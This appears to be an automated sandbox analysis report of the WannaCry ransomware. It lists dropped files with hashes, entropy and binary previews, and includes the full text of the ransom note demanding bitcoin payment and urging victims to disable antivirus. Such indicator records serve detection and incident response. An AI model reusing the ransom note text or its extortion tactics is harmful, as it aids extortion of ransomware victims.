                                                                              SSDEEP:24:LYFlaNiiq9XKMSm9/vtIF0J0YOD6ZBpe9zf+iW3cXxtXx:L5NcZX/9iYE6ZBoDPAcXLx
                                                                              MD5:DB2B3FB1C097B72A20EDFF17F9D50945
                                                                              SHA1:FAAFE97B631058D73B38E582DD39B4C461518354
                                                                              SHA-256:EE1CC5388423A9F51C7C9D7BCF2CB2265D0ECE1BBAC82A8EF4E8F96A9958A5D2
                                                                              SHA-512:6ACD19C6982260A0F4E5CF6A950A7CA897110BD35222E04DC87CF658CE7C1AC3F9C5D3C94B95C87A2226D60DCBA8413D1A1E2EB49556176762FD53FAE750EB3F
                                                                              Malicious:false
                                                                              Preview:.g.@.Y.I.{K[.i.J.I.$.b24.qQ!;.?A.'l........t...q.......hb...F.`k...-N.2.&.cU/..... .t.p?.".?.TM..+T*.QB.........)4.(m.D....QjL..F.Vw.-......KO..B*e$d.1..........%.J5.2.u^..ZV..v[..Jm;W...X....hM..b.-.~....i3..@.DW...D.$}=[6..G.....[.H."N.........|'...Lx..}...... ..F..~.o{I..... e.,..!\px....s.'.H\(...<T..7:...V...".......H..W....[..$.Z..,......>M.Y.n..{'/.}...w#'..~.)..j..$.qq...T.{.,..%2...xoo....*."Xc..%).].3...7.\.Q.....p....8.U.(......5.*..'..(..QnA..)T...........#..E.v.{..J!.\..(3/...:[...\I..0..9P.P<.q.f!...*Vu..R...n.}.....]e....!...,tt......7..V...r.m.z..3.IW...w...}....+.zY{M m._.5..O..8..h.D....hly..#..LUwH|>TB*..w...[-K..G.....a.4..$.P(.-.a.KY..kW*I.(...(.6aRO^z.^.....ugP.!...7_..w.......Mh..b..`....{H'?.b....p.K.o.G.+...d..X.....f8..$......."..&)R!.......R"g)...7O.......wtC..@X+..^+Z.:]J+,...I.G...c~"..x...q8N..+....w...&)...*.o...'dP.4'...._..W....}|y.d..',../Z3e.m.$.{IG.6....l.......5.G{W.b.i..4....(............q..!$.p|....S.;.J..{
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.836983941504955
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1WjK+h3X456/jxOOC9eXFstSeRk9M7J7v57yca8pQ:bkehXI6/dOOCcXFsx7J7cc5Q
                                                                              MD5:8BE76F0D9847CF0A4C2B85C94DA85710
                                                                              SHA1:5E3B26AA20AF0B9D41660449F0D032C66676F7E9
                                                                              SHA-256:E61B3A19C76330735D6F5407C39285BC6DE79896FCA46E4C0B47B551252A46B4
                                                                              SHA-512:BDB0FB3EFE15E5BD8561D51350BC60626893508295601820B4E7FDDEA46F7119D05FD1C36C8E59F9D103DE6825A10B824E2FAE4C3AA09E67D71DAF4C6076083C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....X.)....a)L|'.ZCxU.....4...o.Z.F..X....J.8B.,..../...=....-..%..X.@].O.......h....E#....s2...aG.^...0......N......M.i#...QH..80.[f.kp8......`..Wh.5+....7.|..!9A0(4G.=P....v...C..i. ?.p..Q'.].:.3.....\E.Fd...H...=..c...r;....\.ba.p.R.k. `XF..{..............S.j.y>u.....`..(.....q.....k8.. ..I{....:d!.=.Z[..#...6.J4.j..j6.~O.Y.`.^T..........{0gB.P..O.SE.L@..&...kf....>T...5Y.NX$^..N...P.[.........fX.[S..y...mR..j..ci....Ql.rk9.f.u...19o.tl.....B..w......t1.!..x+....9._KR..jt...T_.,..r9B...u;.>.@./......q.$0...Z.W.%^B...8.3.{.Qhr5FM.k..x.......o.^..`.O.A..*5.;.p.@G.w.W.;..ZP.......'..?.\.A.r.-e.'F.. ...3`....e.)?W4.pJ...x...k].5..k....q.H=R.5kY..nK...W.|e..g:.......0?.6.#....ucIyC4a..(...ML....{Qs.o...e&.1^.....Eh^S..?QGE:f/$*..yc..<Y..T...z..>..ZE.......T.:.:..FXX8J..1.!....g..Y.o8.t8-.e....)"....g.*^q'..).0s.S.....]...4n...7.iG..0.|.3.6X..<.....W.~=..D......mx...#P*{...J.Y>~o....W.-x..xA.f$.+.... *_y ..bYT..+4.Ai.E$.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.836983941504955
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk1WjK+h3X456/jxOOC9eXFstSeRk9M7J7v57yca8pQ:bkehXI6/dOOCcXFsx7J7cc5Q
                                                                              MD5:8BE76F0D9847CF0A4C2B85C94DA85710
                                                                              SHA1:5E3B26AA20AF0B9D41660449F0D032C66676F7E9
                                                                              SHA-256:E61B3A19C76330735D6F5407C39285BC6DE79896FCA46E4C0B47B551252A46B4
                                                                              SHA-512:BDB0FB3EFE15E5BD8561D51350BC60626893508295601820B4E7FDDEA46F7119D05FD1C36C8E59F9D103DE6825A10B824E2FAE4C3AA09E67D71DAF4C6076083C
                                                                              Malicious:false
                                                                              Preview:WANACRY!....X.)....a)L|'.ZCxU.....4...o.Z.F..X....J.8B.,..../...=....-..%..X.@].O.......h....E#....s2...aG.^...0......N......M.i#...QH..80.[f.kp8......`..Wh.5+....7.|..!9A0(4G.=P....v...C..i. ?.p..Q'.].:.3.....\E.Fd...H...=..c...r;....\.ba.p.R.k. `XF..{..............S.j.y>u.....`..(.....q.....k8.. ..I{....:d!.=.Z[..#...6.J4.j..j6.~O.Y.`.^T..........{0gB.P..O.SE.L@..&...kf....>T...5Y.NX$^..N...P.[.........fX.[S..y...mR..j..ci....Ql.rk9.f.u...19o.tl.....B..w......t1.!..x+....9._KR..jt...T_.,..r9B...u;.>.@./......q.$0...Z.W.%^B...8.3.{.Qhr5FM.k..x.......o.^..`.O.A..*5.;.p.@G.w.W.;..ZP.......'..?.\.A.r.-e.'F.. ...3`....e.)?W4.pJ...x...k].5..k....q.H=R.5kY..nK...W.|e..g:.......0?.6.#....ucIyC4a..(...ML....{Qs.o...e&.1^.....Eh^S..?QGE:f/$*..yc..<Y..T...z..>..ZE.......T.:.:..FXX8J..1.!....g..Y.o8.t8-.e....)"....g.*^q'..).0s.S.....]...4n...7.iG..0.|.3.6X..<.....W.~=..D......mx...#P*{...J.Y>~o....W.-x..xA.f$.+.... *_y ..bYT..+4.Ai.E$.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.766799255264814
                                                                              Encrypted:false
                                                                              SSDEEP:24:dk1hDOgcjSU1ZB5axSm6i+m5ITqN+4tznFZgmxrjou:GHDOtWU1P5axSVqN7t7Pjxgu
                                                                              MD5:10E477CBCBE5E91C17AD1059DCFBBE87
                                                                              SHA1:32A097281A7308AFEEC178B34F599B2ED6368FC7
                                                                              SHA-256:56AF218AFC917B671D318CF3604B617470716E6D0C3B8973CB484FD5BEEAA593
                                                                              SHA-512:9D00209D33010CCC410D4C9B71FF155E180AB550E13A991B687BED0B21FE37F4A6473AD264323685B14202CE95ED8EFEDB3CA85822F006459D5C9A221ED917B8
                                                                              Malicious:false
                                                                              Preview:n..G....U.y..-...y.....\E]Y..x..:.[G#F...<.$U....0...j.x.h.4u..T....1R.R.A..B......b.....^..8S.{.....>&G.@...h....i...nOnp...d2cVm.S.=n1...5.S.....A..a5.N....PR....L..k`...1+N..I.b....:...J..5,pYxSLvx}U.9a...w....W.........Q.=).FZ.I.1;..Z.nU.bo.u..j.p....F...`.s......r.j.=..O.$...Z...T..P..?...^06....o....0..`.h.\.T..."....%.s5...{N..AF...U...m.i....3.u.%$.b.j83..(-....-.....mO....$S."...........F........N....J.....m..D..7..I...)@.w.....SHG..iOi.9...t.....n...5...5...J..u...e.CC...)...B..'%*j{...m..NO.gZV.z.....~...~...!o..W.Qs...9...-D$v..A..\..r...gj....Q.........GWI.....0i...U.2.Tv3.I.o...*Ex.5.....Y.@...T.........O....5.U.5.......e.R..o.$M.![..(.[...`....M...=...w.j..0.%.<.\..M.s.*.$......T.....L|.b.%....f.2..).6..5....M.E1$.3.WJ[......&.D.*....H.Zv.......#..4....v\'%....c...2.-.Zc........d..=T!.P.....=.....m..;.......F.SV.CX....NFA.......e.j....Cj.2"..[......1.G~w'...6.@..sJ.....A.R..B.....+.....|Y@M..wp....i.?.....b..0.....?
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.855703605821495
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkSvQUd7AGyPLl49nXceQuIWb3ePvKcbdelMAuXSS:bkSvQ80GyTl4tseQuIWb3cOlfS
                                                                              MD5:AFA0A27885A640F0E4835EC08D438FCD
                                                                              SHA1:03501BF698FE34A17F562A6FBC2966BDCB87567A
                                                                              SHA-256:15C7D252CD61F2939BE1ADB63E7EC3590568B9AB0D8832CF41C797183C3720E3
                                                                              SHA-512:68E087DFAA6C02C544E6BA1D5D5D60D560BDB41D0986B71867E0DC7FF56176CA112B0B559228EFFD79DCEC48CE4A11C42CA3B9B552A1B5F1A2980914E8CA6E09
                                                                              Malicious:false
                                                                              Preview:WANACRY!...."..R7.....iF..`.:......#N..R../EkWG_.zH...5...j.y....!mx...P.d.....~..f...xc..x%B.9:..A..C.I..w|.."../...@ .q..|....4..?.[.^..a.. O,.a...T.8@8._v.....B^$.Yd.V..c{.w..z...]=...I....,..I..)y...U.a.7{...J..!h.j....p..s*...`3l.....'@........`.4..+...............K....j..y.S..............g..^.......L.Gv4n...+_..m.>.=Z...d.5p......IH..dp.P....*V%..9.P..R..z_.._&.;..<..u..R.D;.yOQ:JZG.A....xl.D...a........8|fP-.2.........w.)=A.D....hec.>..qq....).`...? Sr...7.n6*.......Q.7C.'.....Q...n%..D../5.8..h}.k..x0+...U.......?.."`T`KK.!a|.. ?.j.gFh...8._..;..N:.A.}@.b\....6..j...x.j(.F..._zwz.A'q\.5h.a..F.S...abc........J..Y.........mN..3....'{.a.02ju.k./..u.l..A.RkM.wMb..c..X+E.bv..X...5.2U?.u..y..0.A.{j....Y.......*.G.\&..[..X...H...a'...:.+.:....n.n.8.}...|.7..^.........>H9_...t..3J{..Y......!'...../f..B<.-6f.....hn.bf$M.+._...>.*..|C.nJ.c.+{..5[F..a[O.+.=...dF.B....B.....E..V..p.C.....I<.-.}..B...[Z.:Ok.#.......S..e../X..$...m.7&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.855703605821495
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkSvQUd7AGyPLl49nXceQuIWb3ePvKcbdelMAuXSS:bkSvQ80GyTl4tseQuIWb3cOlfS
                                                                              MD5:AFA0A27885A640F0E4835EC08D438FCD
                                                                              SHA1:03501BF698FE34A17F562A6FBC2966BDCB87567A
                                                                              SHA-256:15C7D252CD61F2939BE1ADB63E7EC3590568B9AB0D8832CF41C797183C3720E3
                                                                              SHA-512:68E087DFAA6C02C544E6BA1D5D5D60D560BDB41D0986B71867E0DC7FF56176CA112B0B559228EFFD79DCEC48CE4A11C42CA3B9B552A1B5F1A2980914E8CA6E09
                                                                              Malicious:false
                                                                              Preview:WANACRY!...."..R7.....iF..`.:......#N..R../EkWG_.zH...5...j.y....!mx...P.d.....~..f...xc..x%B.9:..A..C.I..w|.."../...@ .q..|....4..?.[.^..a.. O,.a...T.8@8._v.....B^$.Yd.V..c{.w..z...]=...I....,..I..)y...U.a.7{...J..!h.j....p..s*...`3l.....'@........`.4..+...............K....j..y.S..............g..^.......L.Gv4n...+_..m.>.=Z...d.5p......IH..dp.P....*V%..9.P..R..z_.._&.;..<..u..R.D;.yOQ:JZG.A....xl.D...a........8|fP-.2.........w.)=A.D....hec.>..qq....).`...? Sr...7.n6*.......Q.7C.'.....Q...n%..D../5.8..h}.k..x0+...U.......?.."`T`KK.!a|.. ?.j.gFh...8._..;..N:.A.}@.b\....6..j...x.j(.F..._zwz.A'q\.5h.a..F.S...abc........J..Y.........mN..3....'{.a.02ju.k./..u.l..A.RkM.wMb..c..X+E.bv..X...5.2U?.u..y..0.A.{j....Y.......*.G.\&..[..X...H...a'...:.+.:....n.n.8.}...|.7..^.........>H9_...t..3J{..Y......!'...../f..B<.-6f.....hn.bf$M.+._...>.*..|C.nJ.c.+{..5[F..a[O.+.=...dF.B....B.....E..V..p.C.....I<.-.}..B...[Z.:Ok.#.......S..e../X..$...m.7&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.81153070894513
                                                                              Encrypted:false
                                                                              SSDEEP:24:kCA1ZRNGthrqD14qgb6WUEamniGxrTmIM5HAnytMzMcEfV:BAtNSr44Xb6WUEamniGxrSf5HlcEfV
                                                                              MD5:58FDEC768479AEC633FF6AF3DEB6D7AE
                                                                              SHA1:D5332337C2B1103D13B1E55EB55C3D12862B9FE1
                                                                              SHA-256:D997F2ACC41BE6C311652FF77435D73D1B1FA867AE9270E9ECE893B5D21AC66C
                                                                              SHA-512:2175995C66A464B61F20A0C2B894EFDDCFDA2E0C09A05FEB3A88DF269082BC7C6F4514056675B7A3698A15A68AFD178528523FA4D6E7E39027AAB65D1F53BAF3
                                                                              Malicious:true
                                                                              Preview:.V.tiD...C..]..<.F..hDH..5..q.o.(0.y.,...F_Q.I.(Q.,.O...Q/.I ?.;Jq.vx.?.F........(.&..y...m6.).4.f.i.Q.....=m_(..|....=G.Xh...e.......K...+9..'..`$..Wg....Y7..........W.qc)...`.....,...(.AO....+.4E..j....!!.HTz){......P....4-f.;TA..Br.1....5u..v.*.H..\..T@.WaY.A.X....&i..w.I...@.F;....G......S2S...S.;.*.n..t.\<.....:.._m.k9..#..=.5|..V.hmq..Br.W....S....G.6.^.N.h.M...V..d.....f[..nL....8nt.NQOw........1A.z...u.D..`...9S_aI..@..6A....I.-d.....{.m.?}.Pv..N.._..+...1...H..c......H.....B.%Xl.3..^h~a.|~q......u.&....83h...coT...n}... ...G..|;...{.:..$.......J.....e).o[.~...Y......DC.G.F@I.DZ.H4..\.....1].:..d...+'s..r.....9P{.!.<....^.......r2z..:..k.y..d....$..o..-..Xq:..$...f..v.b%1...R.k..f.-.2..Q...It[....W.9..k..2...e...v!J.GJ..X`D..^.C....G....)C..V..f.(Ml.f\...],..5...3.0.nY..W.2.w8.\.Y.r.....D.E.U.*.zY.....8..BCr...}\.W.U..B...bz.z....P`[...MBy....g..CO.F.>D..l@O..G..~.f.....,..fq.z....c.....'....YY.....t....7...f...m....Z.!.lT..h.+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.827274068569864
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkiqJc00TkCoQsmjQVOoNwvqFusqibtt+H6ymJDd//0e9:bkbcmijm8vwuYmv+n0M
                                                                              MD5:7D4D89CBD0FBDBDBE4E573C0DB43B171
                                                                              SHA1:429F0D5B3ECC73E38F26BAE904E2FC26AE3C8122
                                                                              SHA-256:4984CEB41F30C8C69C924AD91AB216BFEFD65A33618880E496C39BB3FD9FA709
                                                                              SHA-512:A968F6D4B11C07A2F7F8779E787DF22BB4F861F632984B959B9C7F6F860DD07A89EEEEA67F200D30B4F8D077E7DE2938FE1D781429F8B4F6A49A23E8562EDAE9
                                                                              Malicious:false
                                                                              Preview:WANACRY!......fg.....x~.........z...`......$cE{+...%....6$I..5...G9G..ci.C...4U...... .B.x..O...o.1$p...~k.<...[.q-....m.w.e..,..=.d|....h!9...W.n..j..o..!..4..<..h&....>.........o.Y.`..Z..Y..{..&..")+B..qv.PW.u5H..s.)=.8..gZ.z9.^..I..4.W.........Z{A..............?%.i.!.4....}.1?.C.XI).{.(..@.l..)$.+f.*n...?/......%....e.%(I..W.'.p.....W.W.r..C. .$R.........j.?.~.X.K.v6..O.,...|D%)bT ..[.e.u...7.D.~../.(.......;..\...R. .+.q..y....`wr..G..........>..h..........Z.i...<.v%&,..{V. .n./..0...G..e.J..&.....F.'.4..t.....e.w}R......V..#.._..hvb.n.X....;.z@4I....v..$}EU5..q...s..2WJ.}..i.Q...C...6.e...Wv,........t..)i^@..?xFoq.\&xI.......9.X...{...z).<6.. ...8.............._..=..U@|...9.|Y...o..?.7.".#<d..@..RU.....m........'.Y...V..G.~sdb.A..w...6c6....L....y......N...%A.Tm....x...AW.m....9t.s..O/..(n..5..../Y....2.P..x...1n.I~...[$....op..GU.+.e.m.-E/..|.1...l...[.W.k.DR.[U.)........q0........../...k.Ib.i...a7......I=.B.X.U......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.827274068569864
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkiqJc00TkCoQsmjQVOoNwvqFusqibtt+H6ymJDd//0e9:bkbcmijm8vwuYmv+n0M
                                                                              MD5:7D4D89CBD0FBDBDBE4E573C0DB43B171
                                                                              SHA1:429F0D5B3ECC73E38F26BAE904E2FC26AE3C8122
                                                                              SHA-256:4984CEB41F30C8C69C924AD91AB216BFEFD65A33618880E496C39BB3FD9FA709
                                                                              SHA-512:A968F6D4B11C07A2F7F8779E787DF22BB4F861F632984B959B9C7F6F860DD07A89EEEEA67F200D30B4F8D077E7DE2938FE1D781429F8B4F6A49A23E8562EDAE9
                                                                              Malicious:false
                                                                              Preview:WANACRY!......fg.....x~.........z...`......$cE{+...%....6$I..5...G9G..ci.C...4U...... .B.x..O...o.1$p...~k.<...[.q-....m.w.e..,..=.d|....h!9...W.n..j..o..!..4..<..h&....>.........o.Y.`..Z..Y..{..&..")+B..qv.PW.u5H..s.)=.8..gZ.z9.^..I..4.W.........Z{A..............?%.i.!.4....}.1?.C.XI).{.(..@.l..)$.+f.*n...?/......%....e.%(I..W.'.p.....W.W.r..C. .$R.........j.?.~.X.K.v6..O.,...|D%)bT ..[.e.u...7.D.~../.(.......;..\...R. .+.q..y....`wr..G..........>..h..........Z.i...<.v%&,..{V. .n./..0...G..e.J..&.....F.'.4..t.....e.w}R......V..#.._..hvb.n.X....;.z@4I....v..$}EU5..q...s..2WJ.}..i.Q...C...6.e...Wv,........t..)i^@..?xFoq.\&xI.......9.X...{...z).<6.. ...8.............._..=..U@|...9.|Y...o..?.7.".#<d..@..RU.....m........'.Y...V..G.~sdb.A..w...6c6....L....y......N...%A.Tm....x...AW.m....9t.s..O/..(n..5..../Y....2.P..x...1n.I~...[$....op..GU.+.e.m.-E/..|.1...l...[.W.k.DR.[U.)........q0........../...k.Ib.i...a7......I=.B.X.U......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):933
                                                                              Entropy (8bit):4.708686542546707
                                                                              Encrypted:false
                                                                              SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                                              MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                                              SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                                              SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                                              SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                                              Malicious:false
                                                                              Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.811954310378131
                                                                              Encrypted:false
                                                                              SSDEEP:24:jl7al1+bgEiWUPlpelWDXl8wnGFltVX4rLOJvF:jl7svWUfCglKDIfOJvF
                                                                              MD5:D8E093FD66A89C726F8E463C615E247F
                                                                              SHA1:1A11EA4A712CCEFCD1099C5EB199F0B2E91BC25B
                                                                              SHA-256:D02F64D6B3756CB3B9802E578FA8FEA082056955397E4281A7416A837F04E92A
                                                                              SHA-512:1694FC731FA6355B78A563FDB535909BA46763CF70C58D47B832980E811C3984A752E243D46950CD7A1D410B866783617190F8DF2CED0F6A8968FD8A2505B9DD
                                                                              Malicious:false
                                                                              Preview:..J.CJ.......}c..c .m.x...=SV.r.......W.d<.......d....d.....'...E..$Z.^.......:.&.....k....D. c..Zv._.Jm.2..A..P...L2h....:.m}..}..6..I.o.P...1.(q..........kb..c..h.J.....!..R..h1...b;......,q..k8...J2...G...qZ.`T...<j...(.C.*F. .w&.L.l..TU.H8.cL..3.;wO.]&...1.10s?.....YY.v^.9.*1.v`..u...M...a..hd..5..|.......u..$.>..dY.T.s.p6..M..$n.L.c....1..f..U!....z.q2E..YA...*0...M..........Q"l.Nz.]/..h.A5..g.!N.#..[Y+/.oM.ii..vt...0f/....#.......[..&.X..oN...x..G..YDt...%..S.E..#V.(#.....UOKd..79...m.v.;E+,..z7U.H6.x..J.k]H'o.x.Q.....`.f......ySis....X..6.*.!C.F....xGhv.z..|...?.....3.}u.C..R.........ss..!`.L...R. .......bt.+.hg.=fn......g.D.kd.....l.&....k$<RAK.......U8l.lsi...W....C...F........Z.L##y....r.V....y.kJ.....^..U/....P....W.H..(ep.lB..9...r...0m.S.P..Hpc.w'.U.U.y..Z`R1.1..c..\......T....-_<........)8.....#....q....t...(.x~..+?.r.p...\.b..a..l.. .@Iy`.em...:_*.c....S..N.c...r....^..\.PF.TY..n.K.~.J..B.6(..*.6.71..z....7*.f.4...6.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83182337025278
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEo6JyP65B+UXk4izpV2JQN+H/PGPOQKb6Ogd0jxgPM4njz3IDDyEcT:bkB6JyPhei2k+HWPOPu80M4njbIDVY
                                                                              MD5:8802407B7897672A7DBCD83CBE0C7E6A
                                                                              SHA1:BA6CB5223D8EFE050B94A762A7D2BC8E0DB01B50
                                                                              SHA-256:AB1F7CE863DDA57155FCD93D75C7C80AD1C6A2D7B12C32D46671A87FB26415F4
                                                                              SHA-512:D6AD53BC5B6F9B14F08DBBCC37C63D6FDB770E89D6FB217DB888ED21A75DA9587F27CE7951F1E343BC3C044AFA5AF5F8C165FD9030E57069BAC7505025F58073
                                                                              Malicious:false
                                                                              Preview:WANACRY!....]....._.8w./.........g...i..2.9.....4.}....E..Ji.0.J.../..0|3...0....R...>xU.Gr9.q....y.E....Bw......g....F....OY.U...#.P.. .|...j..dI..YS..?a...^..*a/.NwC..4,G]3.P.V...H5........U.8r..7./qt..Nr2A..<s.8q....m.K..i.6..._b.72S....?....S9}.c.x..............Gg...d.....K&..%!..'.~........Q=.}....wz..w.jE4.#.....6...1..@..'.AC..M..P..4...E..5S..0...N...N.TB.Hw.'fr.....i....jm..rw.P:.......-...}.wp..f.......g......2`!..2l.[...}'J....;.....,...RM..i.U...W"..oF2..2....s0/.k.|..w.d.7..Y;..l.3x....o>b.S..gP.`..}%a7..1.4s1*i..t.>....%D..h..4`.?.`.{T ..Z......==....9.!..."O...\..-v+...P.b..HU...6.......j.RO.9..:(..W7.M9._..x.E>^..l9z......y..X.H.u....Y.....p...q.w6.z...........*.L..d.p.a..d.lk\..U.T.W...~..ks+.t.[.c5.6..6.6.#..K....o.#!...:.4Y.y...;.X......7.*I_..3...LV......M.r.p+..".OT...x...{.#.6....Q....I..~u.o.....\..3.r..LF.........o...:).g.w...v.......x$..^...].D.!a.....k.....)...R&.......O..L.....x.46.....'....._...jP..([..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83182337025278
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEo6JyP65B+UXk4izpV2JQN+H/PGPOQKb6Ogd0jxgPM4njz3IDDyEcT:bkB6JyPhei2k+HWPOPu80M4njbIDVY
                                                                              MD5:8802407B7897672A7DBCD83CBE0C7E6A
                                                                              SHA1:BA6CB5223D8EFE050B94A762A7D2BC8E0DB01B50
                                                                              SHA-256:AB1F7CE863DDA57155FCD93D75C7C80AD1C6A2D7B12C32D46671A87FB26415F4
                                                                              SHA-512:D6AD53BC5B6F9B14F08DBBCC37C63D6FDB770E89D6FB217DB888ED21A75DA9587F27CE7951F1E343BC3C044AFA5AF5F8C165FD9030E57069BAC7505025F58073
                                                                              Malicious:false
                                                                              Preview:WANACRY!....]....._.8w./.........g...i..2.9.....4.}....E..Ji.0.J.../..0|3...0....R...>xU.Gr9.q....y.E....Bw......g....F....OY.U...#.P.. .|...j..dI..YS..?a...^..*a/.NwC..4,G]3.P.V...H5........U.8r..7./qt..Nr2A..<s.8q....m.K..i.6..._b.72S....?....S9}.c.x..............Gg...d.....K&..%!..'.~........Q=.}....wz..w.jE4.#.....6...1..@..'.AC..M..P..4...E..5S..0...N...N.TB.Hw.'fr.....i....jm..rw.P:.......-...}.wp..f.......g......2`!..2l.[...}'J....;.....,...RM..i.U...W"..oF2..2....s0/.k.|..w.d.7..Y;..l.3x....o>b.S..gP.`..}%a7..1.4s1*i..t.>....%D..h..4`.?.`.{T ..Z......==....9.!..."O...\..-v+...P.b..HU...6.......j.RO.9..:(..W7.M9._..x.E>^..l9z......y..X.H.u....Y.....p...q.w6.z...........*.L..d.p.a..d.lk\..U.T.W...~..ks+.t.[.c5.6..6.6.#..K....o.#!...:.4Y.y...;.X......7.*I_..3...LV......M.r.p+..".OT...x...{.#.6....Q....I..~u.o.....\..3.r..LF.........o...:).g.w...v.......x$..^...].D.!a.....k.....)...R&.......O..L.....x.46.....'....._...jP..([..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.82700024867395
                                                                              Encrypted:false
                                                                              SSDEEP:24:vzTlGT3PBf65tHUg+ym3XYUcOWrO6zAEcH1HZT3Xe91:vzRGT/KOP3XiprOKS1HZT3uT
                                                                              MD5:B7EBBAABB948AA71D322BA5B7E54FE1E
                                                                              SHA1:1122997B84E1FFD3182F448FF4AFBB994D95B763
                                                                              SHA-256:8E7C2DD0C00CA16DCC4F20BBA96940DF7D7F81339C9F3F94AC2DF1378948EBB4
                                                                              SHA-512:98E737582D445BA1779A391FA9509F49DBAFA0E54258173587A9C5D544AE3BD86D6FDED35A7D14DB70ABA568E6AB216E0144832E75EEE190EF7F1AF3B4129B48
                                                                              Malicious:false
                                                                              Preview:...(~.;.qj.F2.......-X(+X...1....N..`y....E4*.Y..S@...{.b..w.K..M./F'.9.2.2.$..q/6\.L?k[.U.8.6.k.F..`2.j.c....d)....;;\.z..K...^....L.F....gs....T38.yR.+..NM...n.t...MC.#9(..:.MSu!...,t..gl.J..B..n].]8.....LX.t...[..J.....s?.e4..+w....;.J..N..}`..&|...Y.9...6n....V..@..a....X..I.%lJ.^.n.).wc.Y...._.....hnp..2.).s)>}..#@c0>H}....K,.g..w.=.i..C..T.sn.6.jJ...3.....yI.t~..E..K...~$.....o^...#...C..X.5.....a.........~....a.u]...k.h...)O.&M@.............?..%...]......D.......w.'.V...WS....B......F.-=i.q.oD..a......k.....q..0.q:_0,.`."Gxo.Q.-..i....]...8.....nA..d........c.x....m..........#C.=.LH.$...M.^7....@iR-..;l]....O/yv.Z.P.#..p.Pg.m..&..v.t...eq/@x._h.w.H.i.JfEWI.v...,.L.A....^..l....n.. ...Hr%>.m.....v6E.8`o.0R.U....:I6..f..&o... fg>_.5........./|E.K...X.F.Q..(....~...w.....g.."my&.....\N......T.[I....?..*.v..c........uR.........N~t..j\....Ijr-b.......wg..Wc..kS.|..f8.|..I>....e..f.B.y.!i,.y.HF.I.q(Q.x_....A%......:....,E...@.-.j.Se".*9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8502429492249055
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkEPykM9q+GSJgpyPh781XfT2TbHjuDZUZQjrqCQBNqWSw/4HPtRu8sOtWhOvWN8:bkET8q4D7mPwHju+Y4BNqWSwCO8s3OOa
                                                                              MD5:383162B4FCF093CE08B7BC66AE43A600
                                                                              SHA1:8FC606822EEAA72DE58EA5DA22CCC4A97C81B721
                                                                              SHA-256:5DA8C94A1A1472C7D019F8E4DA1E1B7589B0DBEBD8227A65D6D93F2FFB99CD00
                                                                              SHA-512:421D0B8285327C6357AB1FA9116B2A3715AE28E82697113A9E95C44818E3CFACCAD8F933B39DA40EE5EC570153AFD0EF7A6B0A23A6BB147F9BC0C5A6595577C0
                                                                              Malicious:false
